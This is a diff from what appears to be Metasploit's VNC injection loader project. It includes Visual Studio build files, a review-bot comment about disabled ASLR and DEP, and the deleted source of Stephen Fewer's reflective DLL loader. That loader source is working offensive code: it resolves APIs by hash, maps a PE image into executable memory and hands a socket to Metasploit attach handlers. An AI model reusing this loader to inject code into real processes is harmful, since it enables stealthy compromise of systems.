<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX64</TargetMachine>
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
</Link>
<ResourceCompile>
<PreprocessorDefinitions>_X64_;_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;WIN_X86;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<CompileAs>CompileAsC</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<Link>
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
<GenerateDebugInformation>false</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>false</DataExecutionPrevention>
<TargetMachine>MachineX86</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<CompileAs>CompileAsC</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>_X64_;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<Link>
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
<GenerateDebugInformation>false</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>false</DataExecutionPrevention>
<TargetMachine>MachineX64</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" &gt; NUL
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c" />
<ClCompile Include="context.c" />
<ClCompile Include="loader.c" />
<ClCompile Include="inject.c" />
<ClCompile Include="ps.c" />
<ClCompile Include="session.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="context.h" />
<ClInclude Include="loader.h" />
<ClInclude Include="inject.h" />
<ClInclude Include="ps.h" />
<ClInclude Include="session.h" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="loader.rc" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\winvnc\WinVNC.vcxproj">
<Project>{ea6a09ac-04bb-423d-8842-ca48df901058}</Project>
<ReferenceOutputAssembly>false</ReferenceOutputAssembly>
</ProjectReference>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
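Review bot: Both Release configurations disable `<RandomizedBaseAddress>` and `<DataExecutionPrevention>` with no explanation in the project, and the Debug configurations do not set them at all. Presumably this is deliberate because the image is relocated and mapped by its own reflective loader rather than by the OS loader, but that reasoning is not visible anywhere in the commit, so an XML comment next to those elements, e.g. `<!-- ASLR/DEP compatibility flags are intentionally off for this reflectively loaded image -->`, would stop a later cleanup from re-enabling them by accident or leaving them off without knowing why. Separately, the Debug post-build commands end with `exit 0`, which masks an editbin failure, while the Release events do not; the asymmetry looks unintended.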


@ -0,0 +1,65 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Source Files\core">
<UniqueIdentifier>{7c56685d-83b5-4541-b5dd-a620ffe19b23}</UniqueIdentifier>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Header Files\core">
<UniqueIdentifier>{6b6dd5ba-1f40-449f-a55b-7180bb0793a0}</UniqueIdentifier>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="context.c">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="loader.c">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="inject.c">
<Filter>Source Files\core</Filter>
</ClCompile>
<ClCompile Include="ps.c">
<Filter>Source Files\core</Filter>
</ClCompile>
<ClCompile Include="session.c">
<Filter>Source Files\core</Filter>
</ClCompile>
<ClCompile Include="..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c">
<Filter>Source Files\core</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="context.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="loader.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="inject.h">
<Filter>Header Files\core</Filter>
</ClInclude>
<ClInclude Include="ps.h">
<Filter>Header Files\core</Filter>
</ClInclude>
<ClInclude Include="session.h">
<Filter>Header Files\core</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="loader.rc">
<Filter>Resource Files</Filter>
</ResourceCompile>
</ItemGroup>
</Project>


@ -1,53 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
#define _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
// we declare some common stuff in here...
#define DLL_METASPLOIT_ATTACH 4
#define DLL_METASPLOIT_DETACH 5
#define DLL_QUERY_HMODULE 6
#define DEREF( name )*(UINT_PTR *)(name)
#define DEREF_64( name )*(DWORD64 *)(name)
#define DEREF_32( name )*(DWORD *)(name)
#define DEREF_16( name )*(WORD *)(name)
#define DEREF_8( name )*(BYTE *)(name)
typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
#define DLLEXPORT __declspec( dllexport )
//===============================================================================================//
#endif
//===============================================================================================//


@ -1,457 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "ReflectiveLoader.h"
//===============================================================================================//
// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
HINSTANCE hAppInstance = NULL;
//===============================================================================================//
#ifdef _WIN64
#pragma intrinsic( _ReturnAddress )
UINT_PTR eip( VOID ) { return (UINT_PTR)_ReturnAddress(); }
#endif
//===============================================================================================//
/*
* Use Reflective DLL Injection.
*/
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
// otherwise the DllMain at the end of this file will be used.
// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
// otherwise it is assumed you are calling the ReflectiveLoader via a stub.
// This is our position independent reflective DLL loader/injector
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
#else
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
#endif
{
// the functions we need
LOADLIBRARYA pLoadLibraryA;
GETPROCADDRESS pGetProcAddress;
VIRTUALALLOC pVirtualAlloc;
USHORT usCounter;
// the initial location of this image in memory
UINT_PTR uiLibraryAddress;
// the kernels base address and later this images newly loaded base address
UINT_PTR uiBaseAddress;
// variables for processing the kernels export table
UINT_PTR uiAddressArray;
UINT_PTR uiNameArray;
UINT_PTR uiExportDir;
UINT_PTR uiNameOrdinals;
DWORD dwHashValue;
// variables for loading this image
UINT_PTR uiHeaderValue;
UINT_PTR uiValueA;
UINT_PTR uiValueB;
UINT_PTR uiValueC;
UINT_PTR uiValueD;
// STEP 0: calculate our images current base address
// we will start searching backwards from our current EIP
#ifdef _WIN64
uiLibraryAddress = eip();
#else
__asm call geteip
__asm geteip: pop uiLibraryAddress
#endif
// loop through memory backwards searching for our images base address
// we dont need SEH style search as we shouldnt generate any access violations with this
while( TRUE )
{
if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
{
uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
{
uiHeaderValue += uiLibraryAddress;
// break if we have found a valid MZ/PE header
if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
break;
}
}
uiLibraryAddress--;
}
// STEP 1: process the kernels exports for the functions our loader needs...
// get the Process Enviroment Block
#ifdef _WIN64
uiBaseAddress = __readgsqword( 0x60 );
#else
uiBaseAddress = __readfsdword( 0x30 );
#endif
// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
uiBaseAddress = (UINT_PTR)((_PPEB)uiBaseAddress)->pLdr;
// get the first entry of the InMemoryOrder module list
uiValueA = (UINT_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
while( uiValueA )
{
// get pointer to current modules name (unicode string)
uiValueB = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
// set bCounter to the length for the loop
usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
// clear uiValueC which will store the hash of the module name
uiValueC = 0;
// compute the hash of the module name...
do
{
uiValueC = ror( (DWORD)uiValueC );
// normalize to uppercase if the madule name is in lowercase
if( *((BYTE *)uiValueB) >= 'a' )
uiValueC += *((BYTE *)uiValueB) - 0x20;
else
uiValueC += *((BYTE *)uiValueB);
uiValueB++;
} while( --usCounter );
// compare the hash with that of kernel32.dll
if( (DWORD)uiValueC == KERNEL32DLL_HASH )
{
// get this modules base address
uiBaseAddress = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
break;
}
// get the next entry
uiValueA = DEREF( uiValueA );
}
// get the VA of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of name pointers
uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
// get the VA for the array of name ordinals
uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
usCounter = 3;
// loop while we still have imports to find
while( usCounter > 0 )
{
// compute the hash values for this function name
dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
// if we have found a function we want we get its virtual address
if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
{
// get the VA for the array of addresses
uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use this functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// store this functions VA
if( dwHashValue == LOADLIBRARYA_HASH )
pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == GETPROCADDRESS_HASH )
pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == VIRTUALALLOC_HASH )
pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
// decrement our counter
usCounter--;
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
// STEP 2: load our image into a new permanent location in memory...
// get the VA of the NT Header for the PE to be loaded
uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// allocate all the memory for the DLL to be loaded into. we can load at any address because we will
// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
uiBaseAddress = (UINT_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
// we must now copy over the headers
uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
uiValueB = uiLibraryAddress;
uiValueC = uiBaseAddress;
__movsb( (PBYTE)uiValueC, (PBYTE)uiValueB, uiValueA );
// STEP 3: load in all of our sections...
// uiValueA = the VA of the first section
uiValueA = ( (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
// itterate through all sections, loading them into memory.
while( ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections-- )
{
// uiValueB is the VA for this section
uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
// uiValueC if the VA for this sections data
uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
// copy the section over
uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
__movsb( (PBYTE)uiValueB, (PBYTE)uiValueC, uiValueD );
// get the VA of the next section
uiValueA += sizeof( IMAGE_SECTION_HEADER );
}
// STEP 4: process our images import table...
// uiValueB = the address of the import directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
// we assume their is an import table to process
// uiValueC is the first entry in the import table
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// itterate through all imports
while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
{
// use LoadLibraryA to load the imported module into memory
uiLibraryAddress = (UINT_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
// uiValueD = VA of the OriginalFirstThunk
uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
// itterate through all imported functions, importing by ordinal if no name present
while( DEREF(uiValueA) )
{
// sanity check uiValueD as some compilers only import by FirstThunk
if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
{
// get the VA of the modules NT Header
uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of addresses
uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use the import ordinal (- export ordinal base) as an index into the array of addresses
uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
// patch in the address for this imported function
DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
}
else
{
// get the VA of this functions import by name struct
uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
// use GetProcAddress and patch in the address for this imported function
DEREF(uiValueA) = (UINT_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
}
// get the next imported function
uiValueA += sizeof( UINT_PTR );
if( uiValueD )
uiValueD += sizeof( UINT_PTR );
}
// get the next import
uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
}
// STEP 5: process all of our images relocations...
// calculate the base address delta and perform relocations (even if we load at desired image base)
uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
// uiValueB = the address of the relocation directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
// check if their are any relocations present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// and we itterate through all entries...
while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
{
// uiValueA = the VA for this relocation block
uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
// uiValueB = number of entries in this relocation block
uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
// uiValueD is now the first entry in the current relocation block
uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
// we itterate through all the entries in the current block...
while( uiValueB-- )
{
// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
// we dont use a switch statement to avoid the compiler building a jump table
// which would not be very position independent!
if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
*(UINT_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
// get the next entry in the current relocation block
uiValueD += sizeof( IMAGE_RELOC );
}
// get the next entry in the relocation directory
uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
}
}
// STEP 6: process the images exception directory if it has one (PE32+ for x64)
/*
// uiValueB = the address of the relocation directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXCEPTION ];
// check if their are any exception etries present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// get the number of entries
uiValueA = ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size / sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
// uiValueC is now the first entry (IMAGE_RUNTIME_FUNCTION_ENTRY)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// itterate through all entries
while( uiValueA-- )
{
//((IMAGE_RUNTIME_FUNCTION_ENTRY)uiValueC).BeginAddress
// get the next entry
uiValueC += sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
}
}
*/
// STEP 7: call our images entry point
// uiValueA = the VA of our newly loaded DLL/EXE's entry point
uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
// call our respective entry point, fudging our hInstance value
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
#else
// if we are injecting an DLL via a stub we call DllMain with no parameter
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
#endif
// STEP 8: return our new entry point address so whatever called us can call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH
return uiValueA;
}
//===============================================================================================//
#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
// you must implement this function...
extern DWORD DLLEXPORT Init( SOCKET socket );
BOOL MetasploitDllAttach( SOCKET socket )
{
Init( socket );
return TRUE;
}
BOOL MetasploitDllDetach( DWORD dwExitFunc )
{
switch( dwExitFunc )
{
case EXITFUNC_SEH:
SetUnhandledExceptionFilter( NULL );
break;
case EXITFUNC_THREAD:
ExitThread( 0 );
break;
case EXITFUNC_PROCESS:
ExitProcess( 0 );
break;
default:
break;
}
return TRUE;
}
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
{
BOOL bReturnValue = TRUE;
switch( dwReason )
{
case DLL_METASPLOIT_ATTACH:
bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved );
break;
case DLL_METASPLOIT_DETACH:
bReturnValue = MetasploitDllDetach( (DWORD)lpReserved );
break;
case DLL_QUERY_HMODULE:
if( lpReserved != NULL )
*(HMODULE *)lpReserved = hAppInstance;
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}
#endif
//===============================================================================================//


@ -1,197 +0,0 @@
//===============================================================================================//
